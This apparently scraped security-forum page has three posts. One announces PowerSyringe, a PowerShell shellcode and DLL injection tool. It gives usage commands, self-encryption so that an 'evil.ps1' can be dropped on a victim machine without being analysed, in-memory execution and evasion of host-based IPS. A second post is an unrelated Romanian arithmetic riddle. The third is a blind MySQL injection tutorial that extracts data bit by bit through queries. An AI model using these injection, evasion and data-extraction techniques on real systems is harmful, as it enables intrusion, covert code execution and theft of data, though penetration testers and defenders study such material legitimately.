  19. Download Link: PowerSyringe.ps1 So I decided to expand upon my previous post and create a slightly more full-featured Powershell-based code/DLL injection utility. Behold, PowerSyringe. As the name implies, I based some of the code on the original Syringe toolkit. I added several features though - specifically, 64-bit support and encryption. Here is a rundown of its features: Shellcode injection from within Powershell Shellcode injection into any 32 or 64-bit process DLL injection into any 32 or 64-bit process Encryption - The script can encrypt itself and outputs the encrypted version to .\evil.ps1. This will make analysis of the script impossible/improbable without the correct password and salt (or if they happen to perform live memory forensics). >D Decryption - evil.ps1 will decrypt itself back into its original form if you provide the right password and salt Doesn't flag DEP b/c it doesn't execute in the stack Fairly detailed documentation I’ve tested the tool on several 32 and 64-bit platforms but I would love to get some feedback/feature requests. To execute the script, ensure that your execution policy allows you to execute scripts. If not, no worries. You can simply copy and paste the all of the code into a PowerShell prompt. Then you can run ‘help PowerSyringe -full’ for detailed documentation. There are several other methods for bypassing the execution policy. One of those methods is detailed here. Here is an excerpt of the documentation with usage examples: DLL Injection C:\PS>PowerSyringe 1 4274 .\evil.dll Description Inject 'evil.dll' into process ID 4274. Inject shellcode into process C:\PS>PowerSyringe 2 4274 Description Inject the shellcode as defined in the script into process ID 4274 Execute shellcode within the context of PowerShell C:\PS>PowerSyringe 3 Description Execute the shellcode as defined in the script within the context of Powershell. Encrypt the script with the password:'password' and salt:'salty' C:\PS>PowerSyringe 4 .\PowerSyringe.ps1 password salty Description Encrypt the contents of this file with a password and salt. This will make analysis of the script impossible without the correct password and salt combination. This command will generate evil.ps1 that can dropped onto the victim machine. It only consists of a decryption function 'de' and the base64-encoded ciphertext. Note: This command can be used to encrypt any text-based file/script Decrypt encrypted script and execute it in memory C:\PS>[string] $cmd = Get-Content .\evil.ps1 C:\PS>Invoke-Expression $cmd C:\PS>$decrypted = de password salt C:\PS>Invoke-Expression $decrypted Description After you run the encryption option and generate evil.ps1 these commands will decrypt and execute (i.e. define the function) PowerSyringe entirely in memory assuming you provided the proper password and salt combination. Upon successful completion of these commands, you can execute PowerSyringe as normal. Note: "Invoke-Expression $decrypted" may generate an error. Just ignore it. PowerSyringe will still work. This is what evil.ps1 will look like after the encryption function is called: function de([String] $b, [String] $c) { # $a (encrypted PowerSyringe.ps1) truncated for sanity $a = "M4g3yq9lTiMC+GTN2qNCRuUg1TFM8bgSvlxl/ENmXWpEIIgrdMq31/Jl025jClm9CcVZz7VIA40TV..." $encoding = New-Object System.Text.ASCIIEncoding; $dd = $encoding.GetBytes("CRACKMEIFYOUCAN!"); $aa = [Convert]::FromBase64String($a); $derivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($b, $encoding.GetBytes($c), "SHA1", 2); [Byte[]] $e = $derivedPass.GetBytes(32); $f = New-Object System.Security.Cryptography.RijndaelManaged; $f.Mode = [System.Security.Cryptography.CipherMode]::CBC; [Byte[]] $h = New-Object Byte[]($aa.Length); $g = $f.CreateDecryptor($e, $dd); $i = New-Object System.IO.MemoryStream($aa, $True); $j = New-Object System.Security.Cryptography.CryptoStream($i, $g, [System.Security.Cryptography.CryptoStreamMode]::Read); $r = $j.Read($h, 0, $h.Length); $i.Close(); $j.Close(); $f.Clear(); return $encoding.GetString($h,0,$h.Length); } As you can see, the decryption script is slightly 'obfuscated' if you even want to call it that. It's pretty obvious that it decrypts the $a variable. Unfortunately, anyone performing analysis on this evil script will have no idea what the contents of $a are without the correct password and salt. The primary reason I wrote this was because I had been using Syringe on assessments to bypass host-based IPS systems but I didn't like some of the limitations of Syringe (specifically, no 64-bit support) and I like the idea of performing everything in memory without needing to drop any executables. That being said, I welcome your constructive feedback. Enjoy! Source:Exploit Monday: PowerSyringe - PowerShell-based Code/DLL Injection Utility
  20. Am stat sa ma gandesc putin la aceasta problema si mi-am dat seama de acest lucru. Defapt problema vine asa: 50+50=100,100-97=3 si trebuie sa dai inapoi cate 50 de euro,dar mai dai cate 1 din cei 3 ramasi si astfel mai trebuie sa mai raman de platit 49 euro la fiecare parinte.Si 49+49=98 care sunt banii care trebuie inapoiati,deci nu avem de ce sa adaugam si 1 nostru.Deci ,pe scurt,aveam 3 euro ramasi si trebuia sa platim cei 100 de euro imprumutati ,mai dam 2 euro (3-2=1 euro ramas) si raman doar 98 de platit (100-2=98 de platit) si aici nu mai avem de ce sa adunam altceva. Sau nu le mai dadeam nimic.
  21. Faster Blind MySQL Injection Using Bit Shifting ### # Faster blind MySQL injection using bit shifting | Ack Ack for a HTML version # Made by Jelmer de Hen # H.ackAck.net ##### While strolling through mysql.com I came across this page MySQL :: MySQL 5.0 Reference Manual :: 12.11 Bit Functions. There you can view the possibility of the bitwise function right shift. A bitwise right shift will shift the bits 1 location to the right and add a 0 to the front. Here is an example: mysql> select ascii(b'00000010'); +--------------------+ | ascii(b'00000010') | +--------------------+ | 2 | +--------------------+ 1 row in set (0.00 sec) Right shifting it 1 location will give us: mysql> select ascii(b'00000010') >> 1; +-------------------------+ | ascii(b'00000010') >> 1 | +-------------------------+ | 1 | +-------------------------+ 1 row in set (0.00 sec) It will add a 0 at the front and remove 1 character at the end. 00000010 = 2 00000010 >> 1 = 00000001 ^ ^ 0 shifted So let's say we want to find out a character of a string during blind MySQL injection and use the least possible amount of requests and do it as soon as possible we could use binary search but that will quickly take a lot of requests. First we split the ascii table in half and try if it's on 1 side or the other, that leaves us ~64 possible characters. Next we chop it in half again which will give us 32 possible characters. Then again we get 16 possible characters. After the next split we have 8 possible characters and from this point it's most of the times guessing or splitting it in half again. Let's see if we can beat that technique by optimizing this - but first more theory about the technique I came up with. There are always 8 bits reserved for ASCII characters. An ASCII character can be converted to it's decimal value as you have seen before: mysql> select ascii('a'); +------------+ | ascii('a') | +------------+ | 97 | +------------+ 1 row in set (0.00 sec) This will give a nice int which can be used as binary. a = 01100001 If we would left shift this character 7 locations to the right you would get: 00000000 The first 7 bits are being added by the shift, the last character remains which is 0. mysql> select ascii('a') >> 7; +-----------------+ | ascii('a') >> 7 | +-----------------+ | 0 | +-----------------+ 1 row in set (0.00 sec) a = 01100001 01100001 >> 7 == 00000000 == 0 01100001 >> 6 == 00000001 == 1 01100001 >> 5 == 00000011 == 3 01100001 >> 4 == 00000110 == 6 01100001 >> 3 == 00001100 == 12 01100001 >> 2 == 00011000 == 24 01100001 >> 1 == 00110000 == 48 01100001 >> 0 == 01100001 == 97 When we did the bitshift of 7 we had 2 possible outcomes - 0 or 1 and we can compare it to 0 and 1 and determine that way if it was 1 or 0. mysql> select (ascii('a') >> 7)=0; +---------------------+ | (ascii('a') >> 7)=0 | +---------------------+ | 1 | +---------------------+ 1 row in set (0.00 sec) It tells us that it was true that if you would shift it 7 bits the outcome would be equal to 0. Once again, if we would right shift it 6 bits we have the possible outcome of 1 and 0. mysql> select (ascii('a') >> 6)=0; +---------------------+ | (ascii('a') >> 6)=0 | +---------------------+ | 0 | +---------------------+ 1 row in set (0.00 sec) This time it's not true so we know the first 2 bits of our character is "01". If the next shift will result in "010" it would equal to 2; if it would be "011" the outcome would be 3. mysql> select (ascii('a') >> 5)=2; +---------------------+ | (ascii('a') >> 5)=2 | +---------------------+ | 0 | +---------------------+ 1 row in set (0.00 sec) It is not true that it is 2 so now we can conclude it is "011". The next possible options are: 0110 = 6 0111 = 7 mysql> select (ascii('a') >> 4)=6; +---------------------+ | (ascii('a') >> 4)=6 | +---------------------+ | 1 | +---------------------+ 1 row in set (0.00 sec) We got "0110" now and looking at the table for a above here you can see this actually is true. Let's try this on a string we actually don't know, user() for example. First we shall right shift with 7 bits, possible results are 1 and 0. mysql> select (ascii((substr(user(),1,1))) >> 7)=0; +--------------------------------------+ | (ascii((substr(user(),1,1))) >> 7)=0 | +--------------------------------------+ | 1 | +--------------------------------------+ 1 row in set (0.00 sec) We now know that the first bit is set to 0. 0??????? The next possible options are 0 and 1 again so we compare it with 0. mysql> select (ascii((substr(user(),1,1))) >> 6)=0; +--------------------------------------+ | (ascii((substr(user(),1,1))) >> 6)=0 | +--------------------------------------+ | 0 | +--------------------------------------+ 1 row in set (0.00 sec) Now we know the second bit is set to 1. 01?????? Possible next options are: 010 = 2 011 = 3 mysql> select (ascii((substr(user(),1,1))) >> 5)=2; +--------------------------------------+ | (ascii((substr(user(),1,1))) >> 5)=2 | +--------------------------------------+ | 0 | +--------------------------------------+ 1 row in set (0.00 sec) Third bit is set to 1. 011????? Next options: 0110 = 6 0111 = 7 mysql> select (ascii((substr(user(),1,1))) >> 4)=6; +--------------------------------------+ | (ascii((substr(user(),1,1))) >> 4)=6 | +--------------------------------------+ | 0 | +--------------------------------------+ 1 row in set (0.00 sec) This bit is also set. 0111???? Next options: 01110 = 14 01111 = 15 mysql> select (ascii((substr(user(),1,1))) >> 3)=14; +---------------------------------------+ | (ascii((substr(user(),1,1))) >> 3)=14 | +---------------------------------------+ | 1 | +---------------------------------------+ 1 row in set (0.00 sec) 01110??? Options: 011100 = 28 011101 = 29 mysql> select (ascii((substr(user(),1,1))) >> 2)=28; +---------------------------------------+ | (ascii((substr(user(),1,1))) >> 2)=28 | +---------------------------------------+ | 1 | +---------------------------------------+ 1 row in set (0.00 sec) 011100?? Options: 0111000 = 56 0111001 = 57 mysql> select (ascii((substr(user(),1,1))) >> 1)=56; +---------------------------------------+ | (ascii((substr(user(),1,1))) >> 1)=56 | +---------------------------------------+ | 0 | +---------------------------------------+ 1 row in set (0.00 sec) 0111001? Options: 01110010 = 114 01110011 = 115 mysql> select (ascii((substr(user(),1,1))) >> 0)=114; +----------------------------------------+ | (ascii((substr(user(),1,1))) >> 0)=114 | +----------------------------------------+ | 1 | +----------------------------------------+ 1 row in set (0.00 sec) Alright, so the binary representation of the character is: 01110010 Converting it back gives us: mysql> select b'01110010'; +-------------+ | b'01110010' | +-------------+ | r | +-------------+ 1 row in set (0.00 sec) So the first character of user() is "r". With this technique we can assure that we have the character in 8 requests. Further optimizing this technique can be done. The ASCII table is just 127 characters which is 7 bits per character so we can assume we will never go over it and decrement this technique with 1 request per character. Chances are higher the second bit will be set to 1 since the second part of the ASCII table (characters 77-127) contain the characters a-z A-Z - the first part however contains numbers which are also used a lot but when automating it you might just want to try and skip this bit and immediatly try for the next one. © Offensive Security 2011 Source:Vulnerability analysis, Security Papers, Exploit Tutorials
×
×
  • Create New...